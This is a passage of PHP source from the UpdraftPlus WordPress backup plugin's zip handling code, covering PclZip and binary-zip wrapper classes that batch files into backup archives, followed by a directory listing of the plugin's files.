		if (empty($this->pclzip)) {
			$this->last_error = 'Could not get a PclZip object';
			return false;

		// Make the empty directory we need to implement add_empty_dir()
		global $updraftplus;
		$updraft_dir = $updraftplus->backups_dir_location();
		if (!is_dir($updraft_dir.'/emptydir') && !mkdir($updraft_dir.'/emptydir')) {
			$this->last_error = "Could not create empty directory ($updraft_dir/emptydir)";
			return false;

		$this->path = $path;

		return true;


	 * Do the actual write-out - it is assumed that close() is where this is done. Needs to return true/false
	 * @return boolean
	public function close() {

		if (empty($this->pclzip)) {
			$this->last_error = 'Zip file was not opened';
			return false;

		global $updraftplus;
		$updraft_dir = $updraftplus->backups_dir_location();

		$activity = false;

		// Add the empty directories
		foreach ($this->adddirs as $dir) {
			if (false == $this->pclzip->add($updraft_dir.'/emptydir', PCLZIP_OPT_REMOVE_PATH, $updraft_dir.'/emptydir', PCLZIP_OPT_ADD_PATH, $dir)) {
				$this->last_error = $this->pclzip->errorInfo(true);
				return false;
			$activity = true;

		foreach ($this->addfiles as $rdirname => $adirnames) {
			foreach ($adirnames as $adirname => $files) {
				if (false == $this->pclzip->add($files, PCLZIP_OPT_REMOVE_PATH, $rdirname, PCLZIP_OPT_ADD_PATH, $adirname)) {
					$this->last_error = $this->pclzip->errorInfo(true);
					return false;
				$activity = true;

		$this->pclzip = false;
		$this->addfiles = array();
		$this->adddirs = array();


		if ($activity && filesize($this->path) < 50) {
			$this->last_error = "Write failed - unknown cause (check your file permissions)";
			return false;

		return true;

	 * Note: basename($add_as) is irrelevant; that is, it is actually basename($file) that will be used. But these are always identical in our usage.
	 * @param string $file   Specific file to add
	 * @param string $add_as This is the name of the file that it is added as but it is usually the same as $file
	public function addFile($file, $add_as) {
		// Add the files. PclZip appears to do the whole (copy zip to temporary file, add file, move file) cycle for each file - so batch them as much as possible. We have to batch by dirname(). On a test with 1000 files of 25KB each in the same directory, this reduced the time needed on that directory from 120s to 15s (or 5s with primed caches).
		$rdirname = dirname($file);
		$adirname = dirname($add_as);
		$this->addfiles[$rdirname][$adirname][] = $file;

	 * PclZip doesn't have a direct way to do this
	 * @param string $dir Specific Directory to empty
	public function addEmptyDir($dir) {
		$this->adddirs[] = $dir;

	 * Extract a path
	 * @param String $path_to_extract
	 * @param String $path
	 * @see http://www.phpconcept.net/pclzip/user-guide/55
	 * @return Array|Integer - either an array with the extracted files or an error. N.B. "If one file extraction fail, the full extraction does not fail. The method does not return an error, but the file status is set with the error reason."
	public function extract($path_to_extract, $path) {
		return $this->pclzip->extract(PCLZIP_OPT_PATH, $path_to_extract, PCLZIP_OPT_BY_NAME, $path);

class UpdraftPlus_BinZip extends UpdraftPlus_PclZip {

	private $binzip;
	private $symlink_reversals = array();

	 * Class constructor
	public function __construct() {
		global $updraftplus_backup;
		$this->binzip = $updraftplus_backup->binzip;
		if (!is_string($this->binzip)) {
			$this->last_error = "No binary zip was found";
			return false;
		return parent::__construct();

	 * Receive a list of directory symlinks found, allowing their later reversal
	 * @param Array $symlink_reversals
	public function ud_notify_symlink_reversals($symlink_reversals) {
		$this->symlink_reversals = $symlink_reversals;
	 * Add a file to the zip
	 * @param String $file
	 * @param String $add_as
	public function addFile($file, $add_as) {

		global $updraftplus;
		// If $file was reached through a symlink and has been dereferenced, then see if we can do anything about that.
		foreach ($this->symlink_reversals as $target => $link) {
			if (0 === strpos($file, $target)) {
				// Get the "within WP" path back so that we can eventually run "zip -@" from a directory where $add_as actually exists with its given path
				$file = UpdraftPlus_Manipulation_Functions::str_replace_once($target, $link, $file);
		// Get the directory that $add_as is relative to
		$base = UpdraftPlus_Manipulation_Functions::str_lreplace($add_as, '', $file);
		// If the replacement operation has done nothing, i.e. if $file did not begin with $add_as
		if ($file == $base) {
			// Shouldn't happen; but see: https://bugs.php.net/bug.php?id=62119
			$updraftplus->log("File skipped due to unexpected name mismatch (locale: ".setlocale(LC_CTYPE, "0")."): file=$file add_as=$add_as", 'notice', false, true);
		} else {
			$rdirname = untrailingslashit($base);
			// Note: $file equals $rdirname/$add_as
			$this->addfiles[$rdirname][] = $add_as;


	 * The standard zip binary cannot list; so we use PclZip for that
	 * Do the actual write-out - it is assumed that close() is where this is done. Needs to return true/false
	 * @return Boolean - success or failure state
	public function close() {

		if (empty($this->pclzip)) {
			$this->last_error = 'Zip file was not opened';
			return false;

		global $updraftplus, $updraftplus_backup;

		// BinZip does not like zero-sized zip files
		if (file_exists($this->path) && 0 == filesize($this->path)) @unlink($this->path);// phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged -- Silenced to suppress errors that may arise if the file doesn't exist.

		$descriptorspec = array(
			0 => array('pipe', 'r'),
			1 => array('pipe', 'w'),
			2 => array('pipe', 'w')
		$exec = $this->binzip;
		$exec .= " -v -@ ".escapeshellarg($this->path);

		$last_recorded_alive = time();
		$something_useful_happened = $updraftplus->something_useful_happened;
		$orig_size = file_exists($this->path) ? filesize($this->path) : 0;
		$last_size = $orig_size;

		$added_dirs_yet = false;

		// If there are no files to add, but there are empty directories, then we need to make sure the directories actually get added
		if (0 == count($this->addfiles) && 0 < count($this->adddirs)) {
			$dir = realpath($updraftplus_backup->make_zipfile_source);
			$this->addfiles[$dir] = '././.';
		// Loop over each destination directory name
		foreach ($this->addfiles as $rdirname => $files) {

			$process = function_exists('proc_open') ? proc_open($exec, $descriptorspec, $pipes, $rdirname) : false;

			if (!is_resource($process)) {
				$updraftplus->log('BinZip error: proc_open failed');
				$this->last_error = 'BinZip error: proc_open failed';
				return false;

			if (!$added_dirs_yet) {
				// Add the directories - (in fact, with binzip, non-empty directories automatically have their entries added; but it doesn't hurt to add them explicitly)
				foreach ($this->adddirs as $dir) {
					fwrite($pipes[0], $dir."/\n");
				$added_dirs_yet = true;

			$read = array($pipes[1], $pipes[2]);
			$except = null;

			if (!is_array($files) || 0 == count($files)) {
				$write = array();
			} else {
				$write = array($pipes[0]);

			while ((!feof($pipes[1]) || !feof($pipes[2]) || (is_array($files) && count($files)>0)) && false !== ($changes = @stream_select($read, $write, $except, 0, 200000))) {// phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged, VariableAnalysis.CodeAnalysis.VariableAnalysis.UnusedVariable

				if (is_array($write) && in_array($pipes[0], $write) && is_array($files) && count($files)>0) {
					$file = array_pop($files);
					// Send the list of files on stdin
					fwrite($pipes[0], $file."\n");
					if (0 == count($files)) fclose($pipes[0]);

				if (is_array($read) && in_array($pipes[1], $read)) {
					$w = fgets($pipes[1]);
					// Logging all this really slows things down; use debug to mitigate
					if ($w && $updraftplus_backup->debug) $updraftplus->log("Output from zip: ".trim($w), 'debug');
					if (time() > $last_recorded_alive + 5) {
						$last_recorded_alive = time();
					if (file_exists($this->path)) {
						$new_size = @filesize($this->path);// phpcs:ignore Generic.PHP.NoSilencedErrors.Discouraged -- Silenced to suppress errors that may arise because of the function.
						if (!$something_useful_happened && $new_size > $orig_size + 20) {
							$something_useful_happened = true;
						// Log when 20% bigger or at least every 50MB
						if ($new_size > $last_size*1.2 || $new_size > $last_size + 52428800) {
							$updraftplus->log(basename($this->path).sprintf(": size is now: %.2f MB", round($new_size/1048576, 1)));
							$last_size = $new_size;

				if (is_array($read) && in_array($pipes[2], $read)) {
					$last_error = fgets($pipes[2]);
					if (!empty($last_error)) $this->last_error = rtrim($last_error);

				// Re-set
				$read = array($pipes[1], $pipes[2]);
				$write = (is_array($files) && count($files) >0) ? array($pipes[0]) : array();
				$except = null;



			$ret = function_exists('proc_close') ? proc_close($process) : -1;

			if (0 != $ret && 12 != $ret) {
				if ($ret < 128) {
					$updraftplus->log("Binary zip: error (code: $ret - look it up in the Diagnostics section of the zip manual at http://infozip.sourceforge.net/FAQ.html#error-codes for interpretation... and also check that your hosting account quota is not full)");
				} else {
					$updraftplus->log("Binary zip: error (code: $ret - a code above 127 normally means that the zip process was deliberately killed ... and also check that your hosting account quota is not full)");
				if (!empty($w) && !$updraftplus_backup->debug) $updraftplus->log("Last output from zip: ".trim($w), 'debug');
				return false;


		return true;


Name Type Size Permission Actions
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S3.php File 92.43 KB 0555
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cacert.pem File 216.28 KB 0644
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class-updraftcentral-updraftplus-commands.php File 17.82 KB 0555
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class-wpadmin-commands.php File 52.31 KB 0555
class-zip.php File 33.88 KB 0555
ftp.class.php File 22.51 KB 0555
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google-extensions.php File 25.28 KB 0555
jquery-ui.custom-v1.11.4-1-25-1.min.css File 37.84 KB 0644
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jquery-ui.custom-v1.12.1-1-25-1.min.css.map File 59.41 KB 0644
jquery-ui.custom-v1.12.1.css File 44.03 KB 0644
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updraft-restorer-skin.php File 17.69 KB 0555
updraftcentral.php File 18.75 KB 0555
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updraftplus-login.php File 20.27 KB 0555
updraftplus-notices.php File 36.96 KB 0555
updraftplus-tour.php File 29.08 KB 0555
updraftvault.php File 18 KB 0555